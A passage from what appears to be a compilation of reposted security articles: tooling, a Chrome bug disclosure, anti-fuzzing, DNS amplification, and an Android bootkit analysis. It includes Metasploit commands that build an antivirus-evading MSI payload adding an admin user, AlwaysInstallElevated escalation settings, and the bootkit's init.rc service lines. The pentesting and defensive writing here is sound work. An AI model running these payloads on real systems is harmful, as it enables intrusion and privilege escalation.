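    """Apply the 2014 rating-guide caps to a base grade (illustrative only)."""
    order = ["F", "C", "B", "A"]          # simplified grade ladder
    g = base
    if md5_signature or min_key_bits < 1024:
        return "F"                        # insecure: automatic F
    if min_key_bits < 2048 or not tls12:
        g = min(g, "B", key=order.index)  # weak key or no TLS 1.2: cap at B
    if g == "A":
        if warnings:
            return "A-"                   # good config, but with warnings
        if hsts_long_maxage:
            return "A+"                   # exceptional configuration
    return g
```

So a server with a 2048-bit key but no TLS 1.2 lands on B, while a warning-free configuration with long-max-age HSTS is rewarded with A+.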
7. Windbgshark

This project includes an extension for the windbg debugger as well as driver code, which allow you to manipulate virtual machine network traffic and to integrate the Wireshark protocol analyzer with windbg commands. The motivation for this work came from the intention to find a handy, general-purpose way to debug network traffic flows under the Windows OS for the purposes of dynamic software testing for vulnerabilities, for reverse engineering of software, and just for fun.

Theory of operation

The main idea is to rely on the Windows Filtering Platform capability to inspect traffic at the application level of the OSI model (however, the method works well on any level exposed by the WFP API). This gives us a way to intercept and modify any data that goes through the Windows TCP/IP stack (even localhost traffic), regardless of the application type and transport/network protocol. Modification and reinjection also work excellently: the operating system does all the dirty work, reconstructing the transport and network layer headers, for example, as if we were sending the data from a usermode winsock application. This tool needs a virtualized environment (it works fine with VMware Workstation now) with windbg connected to the virtual machine as a kernel debugger. Installation is done in two steps: driver installation and extension loading in windbg. The driver intercepts network traffic, allows windbg to modify it, and then reinjects packets back into the network stack. The extension in turn implements a simple interface for packet editing and also uses Wireshark to display data flows. The extension is executed on the host machine, while the driver is located on the virtual machine. To interact with its driver, the windbg extension sets breakpoints with its own callbacks right inside the driver code.
Every time a packet comes in or out, a breakpoint is hit and windbgshark extracts the app-level payload of the current packet, constructs a new pcap record, and sends it to Wireshark. Before the packet is reinjected, the user may modify it, and Wireshark will re-parse and show the modified record.

Build

Source code is presented as a Visual Studio 2010 solution with both projects; the Windows Driver Kit (Download Windows Hardware Kits and Tools) is required to build this solution. You can build either from the command line or from Visual Studio (Ctrl + …); all the necessary makefiles come along with the source code.

Install

First, you need to prepare your VMware virtual machine to interact with the kernel debugger. This task is covered in Kernel Debugging with WinDbg Host and Target in Virtual Machines; the tool VisualDDK (Create and debug driver projects directly from Visual Studio) simplifies the process a bit. You also need to set up a correct symbol path in windbg, pointing to windbgshark_drv.pdb (debugging symbols for the driver). When windbg is set up, you need to install and start the driver windbgshark_drv.sys; an .inf file is included in this project. Start the driver, for example, from the command line:

sc start windbgshark_drv

After that you can load the windbgshark library in windbg. Copy the dll to a location that can be found by your windbg, and type in the command window: !load windbgshark. The library should start Wireshark (its path is currently hardcoded: you should have the executable C:\Program files\Wireshark\Wireshark.exe on the host machine). Type !windbgshark.help to get the list of commands and start playing with the tool. Sursa: https://code.google.com/p/windbgshark/
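The "constructs a new pcap record and sends it to Wireshark" step relies on the well-known libpcap file framing: one global header, then a 16-byte record header per packet. A sketch of that framing (my own illustration in Python; windbgshark itself is C code inside a windbg extension):

```python
import struct
import time

PCAP_MAGIC = 0xa1b2c3d4   # little-endian pcap magic number
LINKTYPE_RAW = 101        # raw IP packets, no link-layer header

def pcap_global_header(snaplen=65535, linktype=LINKTYPE_RAW):
    """24-byte pcap global header: magic, version 2.4, tz, sigfigs,
    snaplen, linktype."""
    return struct.pack("<IHHiIII", PCAP_MAGIC, 2, 4, 0, 0, snaplen, linktype)

def pcap_record(payload, ts=None):
    """One pcap record: ts_sec, ts_usec, captured length, original
    length, followed by the packet bytes themselves."""
    ts = time.time() if ts is None else ts
    sec, usec = int(ts), int((ts - int(ts)) * 1_000_000)
    return struct.pack("<IIII", sec, usec, len(payload), len(payload)) + payload
```

Writing the global header once, followed by a record per intercepted payload, to a file or pipe yields a stream Wireshark can parse and display live — which is essentially the integration the extension performs.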
8. Chrome Bugs Allow Sites to Listen to Your Private Conversations

By exploiting bugs in Google Chrome, malicious sites can activate your microphone and listen in on anything said around your computer, even after you've left those sites. Even while you're not using your computer, conversations, meetings and phone calls next to it may be recorded and compromised. While we've all grown accustomed to chatting with Siri, talking to our cars, and soon maybe even asking our glasses for directions, talking to our computers still feels weird. But now, Google is putting their full weight behind changing this. There's no clearer evidence of this than visiting Google.com and seeing a speech recognition button right there inside Google's most sacred real estate: the search box. Yet all this effort may now be compromised by a new exploit which lets malicious sites turn Google Chrome into a listening device, one that can record anything said in your office or your home, as long as Chrome is still running. Check out the video to see the exploit in action.

Google's Response

I discovered this exploit while working on annyang, a popular JavaScript speech recognition library. My work has allowed me the insight to find multiple bugs in Chrome, and to come up with this exploit which combines all of them together. Wanting speech recognition to succeed, I of course decided to do the right thing… I reported this exploit to Google's security team in private on September 13. By September 19, their engineers had identified the bugs and suggested fixes. On September 24, a patch which fixes the exploit was ready, and three days later my find was nominated for Chromium's Reward Panel (where prizes can go as high as $30,000). Google's engineers, who've proven themselves to be just as talented as I imagined, were able to identify the problem and fix it in less than two weeks from my initial report. I was ecstatic. The system works.
But then time passed, and the fix didn't make it to users' desktops. A month and a half later, I asked the team why the fix wasn't released. Their answer was that there was an ongoing discussion within the Standards group to agree on the correct behaviour: "Nothing is decided yet." As of today, almost four months after learning about this issue, Google is still waiting for the Standards group to agree on the best course of action, and your browser is still vulnerable. By the way, the web's standards organization, the W3C, has already defined the correct behaviour which would have prevented this… This was done in their specification for the Web Speech API, back in October 2012.

How Does it Work?

A user visits a site that uses speech recognition to offer some cool new functionality. The site asks the user for permission to use his mic, the user accepts, and can now control the site with his voice. Chrome shows a clear indication in the browser that speech recognition is on, and once the user turns it off, or leaves that site, Chrome stops listening. So far, so good. But what if that site is run by someone with malicious intentions? Most sites using speech recognition choose to use secure HTTPS connections. This doesn't mean the site is safe, just that the owner bought a $5 security certificate. When you grant an HTTPS site permission to use your mic, Chrome will remember your choice and allow the site to start listening in the future without asking for permission again. This is perfectly fine, as long as Chrome gives you a clear indication that you are being listened to, and as long as the site can't start listening to you in background windows that are hidden from you. When you click the button to start or stop the speech recognition on the site, what you won't notice is that the site may have also opened another hidden popunder window. This window can wait until the main site is closed, and then start listening in without asking for permission.
This can be done in a window that you never saw, never interacted with, and probably didn't even know was there. To make matters worse, even if you do notice that window (which can be disguised as a common banner), Chrome does not show any visual indication that speech recognition is turned on in such windows - only in regular Chrome tabs. You can see the full source code for this exploit on GitHub.

Speech Recognition's Future

Speech recognition has huge potential for launching the web forward. Developers are creating amazing things, making sites better, easier to use, friendlier for people with disabilities, and just plain cool… As the maintainer of a popular speech recognition library, it may seem that I shot myself in the foot by exposing this. But I have no doubt that by exposing this, we can ensure that these issues will be resolved soon, and we can all go back to feeling very silly talking to our computers… A year from now, it will feel as natural as any of the other wonders of this age. Sursa: Chrome Bugs Lets Sites Listen to Your Private Conversations
9. Introduction to Anti-Fuzzing: A Defence in Depth Aid

Thursday January 2, 2014

tl;dr Anti-Fuzzing is a set of concepts and techniques designed to slow down and frustrate threat actors looking to fuzz test software products, by deliberately misbehaving, misdirecting, misinforming and otherwise hindering their efforts. The goal is to drive down the return on investment seen in fuzzing today by making it more expensive in terms of time and effort when used by malicious aggressors.

History of Anti-Fuzzing

Some of the original concepts that sit behind this post were conceived and developed by Aaron Adams and myself whilst at Research In Motion (BlackBerry) circa 2010. The history of Anti-Fuzzing is one of those fortunate accidents that sometimes occur. Whilst at BlackBerry we were looking to do some fuzzing of the legacy USB stack. For whatever reason the developers had added code so that, when the device encountered an unexpected value at a particular location in the USB protocol, the device would deliberately and catastrophically fail (catfail, in RIM vernacular). This catfail would look to the uninitiated like the device had crashed, and thus you would likely be inclined to investigate further to understand why. Ultimately you'd realise it was deliberate and then come to the conclusion that you had wasted time debugging the issue. After realising that wasting cycles in this manner could potentially be an effective and demoralising defensive technique to frustrate and hinder aggressors, the concept of Anti-Fuzzing was born. Over the following years I fielded questions from at least three researchers who believed they may have found a security issue in the product's USB stack, when in fact they had simply tripped over the same intended behaviour. There is prior art in this space: two industry luminaries, Haroon Meer and Roelof Temmingh, explored similar ideas in their seminal 2004 paper When the Tables Turn.
In January 2013 a blog post titled Advanced Persistent Trolling by Francesco Manzoni discussed an Anti-Fuzzing concept specifically designed to frustrate penetration testers during web application assessments. This is obviously not something I condone, but it introduced some similar techniques and concepts in the context of web applications specifically.

Anti-Tamper: an Introduction

Before we get onto Anti-Fuzzing, it's first worth understanding what Anti-Tamper is, as it heavily influenced the early formation of the idea. In short, Anti-Tamper is a US Department of Defense concept that is summarised (overview presentation) as follows: Anti-Tamper (AT) encompasses the systems engineering activities intended to prevent and/or delay exploitation of critical technologies in U.S. weapon systems. These activities involve the entire life-cycle of systems acquisition, including research, design, development, implementation, and testing of AT measures. Properly employed, AT will add longevity to a critical technology by deterring efforts to reverse-engineer, exploit, or develop countermeasures against a system or system component. AT is not intended to completely defeat such hostile attempts, but it should discourage exploitation or reverse-engineering or make such efforts so time-consuming, difficult, and expensive that even if successful, a critical technology will have been replaced by its next-generation version. These goals can equally apply to fuzzing.

Anti-Fuzzing: a Summary

If we take the Anti-Tamper mission statement and adjust the language for Anti-Fuzzing, we arrive at something akin to: Anti-Fuzzing (AF) encompasses the systems engineering activities intended to prevent and/or delay fuzzing of software. Properly employed, AF will add longevity to the security of a technology by deterring efforts to fuzz, and thus find vulnerabilities via this method, against a system or system component.
AF is not intended to completely defeat such hostile attempts, but it should discourage fuzzing or make such efforts so time-consuming, difficult, and expensive that even if successful, a critical technology will have been replaced by its next-generation version with improved mitigations. Now these are lofty goals for sure, but as you'll see we can go some way towards meeting them using a variety of different approaches. As with Anti-Tamper, Anti-Fuzzing is intended to:

Deter: the threat actor's willingness or ability to fuzz effectively (i.e. have the aggressor pick an easier target).
Detect: fuzzing, and respond accordingly in a defensive manner.
Prevent or degrade: the threat actor's ability to succeed in their fuzzing mission.

Articol complet: https://www.nccgroup.com/en/blog/2014/01/introduction-to-anti-fuzzing-a-defence-in-depth-aid/
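The deter/detect/degrade goals, and the "catfail" story above, can be illustrated with a toy parser. This sketch is entirely my own (the article contains no code): it counts malformed inputs and, past a threshold, starts answering with the kind of deliberate, misleading crash that burns an aggressor's triage time:

```python
import random

class AntiFuzzParser:
    """Toy protocol parser that misbehaves once it suspects fuzzing."""

    def __init__(self, threshold=5, seed=None):
        self.malformed_seen = 0
        self.threshold = threshold
        self.rng = random.Random(seed)

    def suspects_fuzzing(self):
        # Crude detection: many malformed inputs in a row looks like a fuzzer.
        return self.malformed_seen >= self.threshold

    def parse(self, data: bytes):
        if not data.startswith(b"MAGIC"):      # an "unexpected value at a
            self.malformed_seen += 1           #  particular location"
            if self.suspects_fuzzing():
                # Deliberate misdirection: fake a crash at a random-looking
                # address so the aggressor wastes cycles debugging it.
                raise RuntimeError(
                    "access violation at 0x%08x" % self.rng.getrandbits(32))
            raise ValueError("bad header")     # honest error, early on
        return data[5:]                        # well-formed: real payload
```

A real implementation would live in the target's input-handling code and could also add delays or degrade output; the point here is only the shape of the detect-then-misdirect response.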
10. Bypassing Anti-Virus with Metasploit MSI Files

1/20/2014 | NetsPWN

A while back I put together a short blog titled 10 Evil User Tricks for Bypassing Anti-Virus. The goal was to highlight common anti-virus misconfigurations. While I was chatting with Mark Beard he mentioned that I neglected to include how to use Metasploit payloads packaged in MSI files. So in this blog I'll try to make amends by providing a quick and dirty walkthrough of how to do that. This should be useful for both sysadmins and penetration testers.

Creating MSI Files that Run Metasploit Payloads

The Metasploit Framework team (and the greater security community) has made it easy and fun to package Metasploit payloads in almost any file format. Thankfully that includes MSI files. MSI files are Windows installation packages commonly used to deploy software via GPO and other methods. Luckily for penetration testers, some anti-virus solutions aren't configured by default to scan .msi files or the .tmp files that are generated when MSI files are executed. For those of you who are interested in testing whether your anti-virus solution stops Metasploit payloads packaged in .MSI files, I worked with Mark to put together this short procedure. Use the msfconsole to create an MSI file that will execute a Metasploit payload. Feel free to choose your favorite payload, but I chose adduser because it makes for an easy test. Note: this payload requires local admin privileges to add the user.

msfconsole
use payload/windows/adduser
set PASS Attacker123!
set USER Attacker
generate -t msi -f /tmp/evil.msi

Alternatively, you can generate the MSI file with the msfvenom ruby script that comes with Metasploit:

msfvenom -p windows/adduser USER=Attacker PASS=Attacker123! -f msi > evil.msi

Copy the evil.msi file to the target system and run the MSI installation from the command line to execute the Metasploit payload.
From a penetration test perspective, using the /quiet switch is handy because it suppresses messages that would normally be displayed to the user.

msiexec /quiet /qn /I c:\temp\evil.msi

Check anti-virus logs to see if the payload was identified. You can also check whether the payload executed and added the "Attacker" user with the command below. If user information is returned, then the payload executed successfully.

net user attacker

The MSI file is configured to execute the payload, but will not complete the formal installation process, because the authors (Ben Campbell and Parvez Anwar) forced it to fail using some invalid VBS. So uninstalling it won't be required after execution. However, during execution a randomly named .tmp file containing the MSF payload will be created in the c:\windows\Installer\ folder. The file should be cleaned up automatically, but if the installation fails out for any reason the file will most likely need to be removed manually. The file will look something like "c:\windows\Installer\MSI5D2F.tmp". As a side note, it appears that the .tmp file is basically a renamed .exe file. So if you manually rename the .tmp file to an .exe file you can execute it directly. Also, once it's renamed to an .exe file, anti-virus starts to pick it up.

Escalating Privileges with MSI Packages

As it turns out, MSI files are handy for more than simply avoiding anti-virus. Parvez Anwar figured out that they can also be used to escalate privileges from local user to local administrator if the group policy setting "Always install with elevated privileges" is enabled for both the computer and user configurations. The setting is exactly what it sounds like. It provides users with the ability to install any horrible ad-ware, pron-ware, or malware they want onto corporate systems.
In gpedit.msc the configuration looks something like this:

The policies can also be viewed or modified at the following registry locations:

[HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Installer]
"AlwaysInstallElevated"=dword:00000001

[HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer]
"AlwaysInstallElevated"=dword:00000001

For those of you who don't want to go through the hassle of generating and executing the MSI files manually, Ben Campbell (meatballs) and Parvez Anwar were nice enough to put together a Metasploit module to do it for you, called "Windows AlwaysInstallElevated MSI". The technique was also mentioned during a recent presentation by Rob Fuller (mubix) and Chris Gates (carnal0wnage) titled "AT is the new BLACK", which is worth checking out.

Wrap Up

The downside is that MSI files can pose a serious threat if anti-virus and group policy settings are not configured securely. However, the bright side is that it's an easy problem to fix in most environments. Good hunting, and don't forget to Hack Responsibly!

References

Windows Installer Package: http://msdn.microsoft.com/en-us/library/aa244642(v=vs.60).aspx
Advanced Installer - Download
rewt dance: Metasploit MSI Payload Generation
Abusing MSI's elevated privileges | GreyHatHacker.NET

Sursa: https://www.netspi.com/blog/entryid/212/bypassing-anti-virus-with-metasploit-msi-files
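Note that the escalation only works when the dword is 1 in both of the registry hives quoted above. A tiny sketch of that decision (my own hypothetical helper; on a live Windows host you would read the two AlwaysInstallElevated values with winreg or `reg query`):

```python
def always_install_elevated(hkcu_value, hklm_value):
    """Escalation via MSI is possible only if AlwaysInstallElevated is 1
    in BOTH the user (HKCU) and machine (HKLM) policy keys; a missing
    value (None) counts as disabled."""
    return hkcu_value == 1 and hklm_value == 1
```

This mirrors the check the "Windows AlwaysInstallElevated MSI" Metasploit module performs before attempting the attack.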
  11. Nytro

idb

idb

idb is a tool to simplify some common tasks for iOS pentesting and research. It is still a work in progress but already provides a bunch of (hopefully) useful commands. The goal was to provide all (or most) functionality for both iDevices and the iOS simulator. For this, a lot is abstracted internally to make it work transparently for both environments, although recently the focus has been more on supporting devices. idb was released as part of a talk at ShmooCon 2014. The slides of the talk are up on Speakerdeck. There is also a blog post on my personal website that I will update with the video of the talk once it is available.

Getting Started

Visit the getting started guide on the wiki. Bug reports, feature requests, and contributions are more than welcome!

Command-Line Version

idb started out as a command line tool which is still accessible through the cli branch. Find the getting started guide and some more documentation in the wiki.

idb Features

Simplified pentesting setup: set up port forwarding, certificate management
iOS log viewer
Screen shot utility: simplifies testing for the creation of backgrounding screenshots
App-related functions: app binary download, list imported libraries, check for encryption, ASLR, stack canaries, decrypt and download an app binary (requires dumpdecrypted), launch an app, view app details such as name, bundle id, and Info.plist file
Inter-Process Communication URL handlers: list URL handlers, invoke and fuzz URL handlers
Pasteboard monitor
Analyze local file storage: search for, download, and view plist files, sqlite databases, and local caches (Cache.db); file system browser
Install utilities on iDevices: install iOS SSL Kill Switch; alpha: compile and install dumpdecrypted
Alpha: Cycript console, Snoop-It integration

Sursa: https://github.com/dmayer/idb
12. Anatomy of a DNS DDoS Amplification Attack

by David Piscitello, ICANN SSAC Fellow

Over the past several months, a series of Distributed Denial of Service (DDoS) attacks victimized DNS root and Top Level Domain (TLD) name server operators. These attacks merit careful analysis because they combine several attack tools and methods to increase their effectiveness. The attacks also call attention to an operational problem that was solved long ago; yet most IT administrators have not adopted the answer.

The attacker's toolkit

The attacks observed against root and TLD name servers are variants of a DNS amplification attack and use the following tools:

System compromise. An attacker doesn't want to use his own system to attack other systems and risk discovery, so he launches the attack from systems on which he has gained unauthorized administrative control. There are many ways to gain control of systems. One method uses a mass email worm to infect a large number of systems. When the worm infects a system, it installs a remote software agent, or zombie, that the attacker can remotely control and direct to initiate a DoS attack.

Distributing the DoS attack sources. In the attacks observed, the attacker's goal is to saturate the targeted name server operator's communications infrastructure rather than the name servers themselves. Name server operators typically have large access circuits, so launching an attack from a single source is unlikely to accomplish this goal. But by amassing a veritable army of attack sources, the attacker can fill even Gigabit-per-second access circuits. Botnets, collections of zombie hosts the attacker "owns," commonly serve as the attacker's army.

Amplification. Attackers use amplification to increase the traffic volume in an attack. In the DNS attacks, the attacker uses an extension to the DNS protocol (EDNS0) that enables large DNS messages.
The attacker composes a DNS request message of approximately 60 bytes to trigger delivery of a response message of approximately 4000 bytes to the target. The resulting amplification factor, approximately 70:1, significantly increases the volume of traffic the target receives, accelerating the rate at which the target's resources will be depleted.

DNS data corruption. To achieve the amplification effect, the attacker issues a DNS request that he knows will evoke a very large response. There are many ways for the attacker to know which DNS resource record to request in advance. For this article, we'll choose one and assume that the attacker has previously compromised a poorly configured name server and has modified this server's zone file to include a DNS TXT resource record of approximately 4000 bytes to serve as the amplification resource record.

Impersonation. In the DNS attacks, each attacking host uses the targeted name server's IP address as its source IP address rather than its own. The effect of spoofing IP addresses in this manner is that responses to DNS requests will be returned to the target rather than the spoofing hosts.

Exploitable name service operation. The DNS attacks exploit name servers that allow open recursion. Recursion is a method of processing a DNS request in which a name server performs the request for a client by asking the authoritative name server for the name record. Recursion is not inherently bad; however, recursion should only be provided for a trusted set of clients. Name servers that perform (open) recursion for any host provide attackers with an easily exploitable vector.

The Attack

Now that you are familiar with the attack elements, let's look at how the attack is performed. The attacker recruits his army of attack sources (the botnet). He writes the large amplification record (e.g., a 4000 byte DNS TXT resource record) in the zone file of the name server he has compromised.
He tests for and compiles a list of open recursive name servers that will query the compromised name server on behalf of the spoofing hosts. (More than one million insecurely configured name servers worldwide provide open recursion, so this is quite an easy list to compile.) With these elements in place, the attacker commands his army to attack a targeted name server via the open recursive servers.

Suppose the attacker targets a name server at the IP address 10.10.1.1. At the attacker's signal, all the zombies in his botnet issue DNS request messages asking for the amplification record through open recursive servers (see diagram). The botnet hosts spoof the targeted name server by writing 10.10.1.1 in the source IP address field of the IP packets containing their DNS request messages. The open recursive name servers accept the DNS request messages from the botnet hosts. If the open recursive name servers have not received a request for this record before, and do not already hold the amplification record in their cache, they issue a DNS request message of their own to the compromised name server to retrieve it, and the compromised name server returns the amplification record to the open recursive servers.

The open recursive servers compose DNS response messages containing the amplification record and return these to the systems that originated the request. The open recursive servers believe they are sending DNS response messages to the botnet hosts that made the initial query, when in fact IP spoofing causes the responses to be forwarded to the target name server at 10.10.1.1. The targeted name server at 10.10.1.1 never issued any DNS request messages but is now bombarded with responses. The responses contain a 4000 byte DNS TXT record. A message of this size exceeds the maximum (Ethernet) transmission unit, so it is broken into multiple IP packet fragments.
This forces reassembly at the destination, which increases the processing load at the target and enhances the deception: because the response spans several IP fragments, and only the first fragment contains the UDP header, the target may not immediately recognize that the attack is DNS-based. This DDoS attack is most effective when launched via a large number of open recursive servers. Distribution increases the traffic and decreases the focus on the sources of the attack. The impact on the misused open recursive servers is generally low, so the misuse generally goes undetected. The effect on the target, however, can be severe. Attacks based on this method have achieved a bandwidth consumption rate exceeding seven (7) Gigabits per second.

Surviving (if you are the target)

There are several measures you can take to diminish the effects of this DDoS attack. The source IP addresses are not spoofed in the IP packets carrying the DNS response messages, so the source addresses identify the open recursive servers the zombies use. Depending on the severity of the attack and how strongly you wish to respond, you can rate-limit traffic from these source IP addresses or use a filtering rule that drops DNS response messages that are suspiciously large (over 512 bytes). In the extreme, you may choose to block traffic from the open recursive servers entirely. These efforts do not squelch the attack sources, and they do not reduce the load on networks and switches between your name server and the open recursive servers. Note that if you block all traffic from these open recursive servers you may interfere with legitimate attempts to resolve names through these servers; for example, some organizations run open recursive servers so that mobile employees can resolve from a "trusted" name server, so such users can be affected.

What can you do to reduce the threat?

We know the tools attackers use, so we need to prevent the attacker from assembling his toolkit. Two countermeasures are obvious.
Securely configure client systems and use antivirus protection so that the attacker is unable to recruit his botnet army. Securely configure name servers to reduce the attacker's ability to corrupt a zone file with the amplification record. Disable open recursion on your name servers and only accept recursive DNS from trusted sources. This measure will greatly reduce the attack vectors. It is a relatively simple configuration change on common DNS application services such as Windows 2003 Server and BIND. If you are using an external DNS name server, test to see if it is offering open recursion. Contact your ISP or DNS provider and suggest they close this security loophole if it is open. Even when used in combination, these measures cannot have the same mitigating effect as source IP address validation. By performing source IP address validation, you can effectively prevent the impersonation attack: the botnet hosts can't generate DNS request messages posing as the targeted name server, which stems the attack at the outset. If you run an Internet firewall or a router that supports access control lists, modify your egress traffic filtering policy to only allow IP packets to exit your network if they contain source IP addresses assigned from the subnets you use internally. Source IP address validation is not widely implemented, despite repeated encouragement to do so by security experts and advisory groups such as SANS, CERT, and ICANN's Security and Stability Advisory Committee (SSAC). Critics of source IP address validation claim that implementation adds administrative overhead and adversely impacts performance. Sustained DDoS attacks against root and TLD name servers have potentially graver consequences, and the frequency and effectiveness of DDoS attacks are only increasing while we continue to ignore this much-needed security measure. Telecommunications networks have been validating telephone numbers and addresses on ingress traffic for decades. 
It's time for IP networks to do the same. Sursa: Anatomy of a DNS DDoS Amplification Attack | WatchGuard
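As a coda to the article above, the amplification leverage and the egress-filtering countermeasure it describes can be sketched in a few lines of Python. The 4000-byte TXT response size comes from the article; the ~60-byte request size and the subnet values are illustrative assumptions.

```python
import ipaddress

# Rough amplification estimate: bytes delivered to the victim per byte
# the attacker sends. The 4000-byte TXT response is from the article;
# the ~60-byte request size is an illustrative assumption.
def amplification_factor(request_bytes, response_bytes):
    return response_bytes / request_bytes

# Egress source-address validation: only let a packet leave the network
# if its source address belongs to a subnet assigned internally
# (hypothetical documentation subnets here, not real ones).
INTERNAL_SUBNETS = [ipaddress.ip_network("192.0.2.0/24"),
                    ipaddress.ip_network("198.51.100.0/24")]

def egress_allowed(src_ip):
    addr = ipaddress.ip_address(src_ip)
    return any(addr in net for net in INTERNAL_SUBNETS)

print(round(amplification_factor(60, 4000), 1))  # ~66.7x leverage
print(egress_allowed("192.0.2.10"))  # True: legitimate internal source
print(egress_allowed("10.10.1.1"))   # False: spoofed target address is dropped
```

With this rule in place at the network edge, the zombies' packets claiming to come from 10.10.1.1 never leave the attacker's network, which is exactly why the article calls source IP address validation the strongest mitigation.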
13. [h=1]Oldboot: the first bootkit on Android[/h]Zihang Xiao Qihoo 360 Technology Co. Ltd. (NYSE: QIHU) Zihang Xiao, Qing Dong, Hao Zhang and Xuxian Jiang Jan 17, 2014 —— A few days ago, we found an Android Trojan that uses a brand-new method to modify the device's boot partition and booting script file in order to launch a system service and extract a malicious application during the early stage of the system's booting. Due to the special RAM disk feature of Android devices' boot partition, no current mobile antivirus product in the world can completely remove this Trojan or effectively repair the system. We named this Android Trojan family Oldboot. As far as we know, this is the first bootkit found on the Android platform in the wild. According to our statistics, as of today, more than 500,000 Android devices have been infected by this bootkit in China in the last six months. We've released a new security tool (download) which can accurately detect and disable it. [h=2]Construction and behaviors of Oldboot[/h] When an Android device is infected by Oldboot, its user will find new applications containing lots of advertisements frequently being installed on the system. In the installed applications list, the user will find a system application named GoogleKernel which can't be uninstalled manually. Antivirus products, such as 360 Mobile Security, will classify this application as malware (Figure 1). However, after removing it and rebooting the device, the two previous phenomena will occur again. 
Oldboot consists of four executable or configuration files: /init.rc, the configuration script for the Android system's booting, which has been modified by Oldboot /sbin/imei_chk, an ELF executable file for the ARM architecture /system/app/GoogleKernel.apk, an Android application which is installed as a system application /system/lib/libgooglekernel.so, the native library used by GoogleKernel Figure 1 Antivirus product classifies GoogleKernel as malware These four files have a complex calling relationship (Figure 2): When the Android system is booting, it will read init.rc, launch the imei_chk as a system service and open the related local socket; The imei_chk will then extract libgooglekernel.so into /system/lib; The imei_chk will also extract GoogleKernel.apk into /system/app; After the system finishes booting, GoogleKernel.apk is installed as a system application. It will periodically execute native code in libgooglekernel.so to trigger malicious behaviors; The libgooglekernel.so will generate configurations or malicious commands, and pass them to Java code in GoogleKernel.apk; The GoogleKernel.apk sends commands to the imei_chk through the socket. These commands are executed by the imei_chk at last. Figure 2 Components of Oldboot and their relationship Below is a more detailed analysis of these files. At the end of init.rc's content, we found these lines: service imei_chk /sbin/imei_chk class core socket imei_chk stream 666 According to this, when the Android system boots, the init process will launch a new system service named imei_chk with root permission, and will create a local socket with the same name. 
Before creating the socket and listening, the imei_chk will execute some code which reads two data blocks from its read-only data segment and then extracts them to these two files (Figure 3): /system/lib/libgooglekernel.so /system/app/GoogleKernel.apk Figure 3 The imei_chk extracts the so and APK files On the other side, the imei_chk will create a socket to receive all incoming data. These data will be parsed into Linux system commands which will be executed with root permission at last (Figure 4). Figure 4 The imei_chk receives commands and executes them In the infected device, we found the imei_chk socket is running with root permission and is listening to receive data from any other process. Please note that the access property of this socket device is 666 with the setuid flag (Figure 5). This world-writable property leads to a serious security vulnerability: in infected devices, any other application can send this socket device Linux commands which will be executed with root permission later. Figure 5 The imei_chk socket device can be written by any process When the Android system is booting, it will check whether all APK files under /system/app are installed. If not, it will install them as system applications (or so-called pre-installed applications). Thus, GoogleKernel.apk will be installed as a system application, while libgooglekernel.so, its dependent native library, has been extracted to the correct place. When removing normal Android malware, all previous Android antivirus products will only uninstall and delete the malicious APK and so files. Thus, when the device reboots, the undeleted imei_chk will extract GoogleKernel.apk again. In fact, these antivirus products not only won't, but also can't effectively remove the imei_chk. We'll discuss this later. Let's have a deeper look into the GoogleKernel.apk. 
It declares many system- or dangerous-level permissions in the AndroidManifest.xml, and specifies that it runs as the system user: <uses-permission android:name="android.permission.MOUNT_UNMOUNT_FILESYSTEMS" /> <uses-permission android:name="android.permission.INSTALL_PACKAGES" /> <uses-permission android:name="android.permission.DELETE_PACKAGES" /> <uses-permission android:name="android.permission.CLEAR_APP_USER_DATA" /> <uses-permission android:name="android.permission.WRITE_SECURE_SETTINGS" /> …… <application android:allowBackup="true" android:allowClearUserData="false" android:killAfterRestore="false" android:label="GoogleKernel" android:persistent="true" android:process="system"> The application has only one service named Dalvik and two receivers named BootRecv and EventsRecv, without any activity or user interface. Its main behaviors include collecting system information, changing network settings, and periodically triggering other malicious behaviors such as: Connecting to its C&C server (Figure 6) to download a configuration file; Connecting to its C&C server to get back system commands, and executing them with root permission; Downloading APK files (Figure 7) and installing them as system applications (Figure 8); Uninstalling specified system applications. From some unfinished functions' names, it seems that the author of Oldboot was planning to implement sending SMS to any specified phone number (Figure 9). Figure 6 The libgooglekernel.so stores C&C servers' URL in its global config Figure 7 The libgooglekernel.so downloads APK files and installs them Figure 8 The downloaded APK files are installed as system applications Figure 9 The libgooglekernel.so tries to send SMS, but the related Java code isn't finished The author of Oldboot deliberately designed the implementation of the malicious behaviors. 
All main malicious behaviors are split into many different execution phases which are implemented in different components: The GoogleKernel.apk will periodically activate itself to call JNI interfaces of the so file to trigger malicious behaviors (Phase 1). If the behavior is to connect with C&C servers, the so file will construct the servers' URLs and call Java code in the APK file through JNI again (Phase 2). The APK file will start an HTTP connection to the servers and return the request result to the so file (Phase 3). The so file then parses the result's format to get commands, configuration or data (Phase 4). If the behavior is to install APK files, or to uninstall system applications, after downloading APK files through the above phases, the so file will construct system commands (including remounting the system partition and pm install/uninstall) for installation or uninstallation and pass them to the APK file through JNI (Phase 5). The APK file will send these commands to the imei_chk service through the local socket (Phase 6, see Figure 10 and Figure 11). At last, the imei_chk will execute these commands with root permission (Phase 7). Figure 10 The GoogleKernel.apk initializes a connection with the local socket imei_chk Figure 11 The GoogleKernel.apk sends system commands to the socket [h=2]New infection methods[/h] Differing from previous malware on Android, the main specialty of Oldboot is its modification of the init.rc file and the /sbin directory. In Android, the root directory and the /sbin directory are located in the RAM disk which is loaded from the boot partition of the device's disk. This RAM disk is a read-only in-memory file system, and any runtime change to it will never be physically written back to the disk. Thus, during the system's running, even if we remount the partition as writable and delete some files in these directories, the deletions won't really apply to the disk. After the device reboots, these files will appear again. 
Previous Android malware, such as DroidKungfu, may extract malicious files to the /system partition. But the /system partition doesn't have the above feature, which means there is no technical difficulty in either the malware's file writing or the antivirus' file deleting. However, when facing Oldboot, even if the antivirus products know that the imei_chk is malicious and needs to be deleted, they can't completely delete it by the traditional method, since this "remount" method will only delete the copy of /sbin/imei_chk in memory but won't affect the disk partition. The problem is, how did the attacker put the imei_chk into the /sbin directory and successfully modify the init.rc script? We believe there are at least two ways to achieve it: The attacker has a chance to physically touch the devices, and flashes a malicious boot.img image file to the boot partition of the disk; During the system's running, after gaining root permission, forcibly write malicious files into the boot partition through the dd utility. In Oldboot's case, we are more inclined to believe that the attacker chose the first way (but we still can't exclude the possibility of the second one). Here are the reasons: Firstly, we found the infected device was bought from a big IT mall in Zhongguancun, which is the biggest and most famous consumer electronics distribution center in Beijing. In the past, we've found some retailers here flashing system images which contain malware into the mobile phones or tablets they sell. Secondly, the infected device (a Galaxy 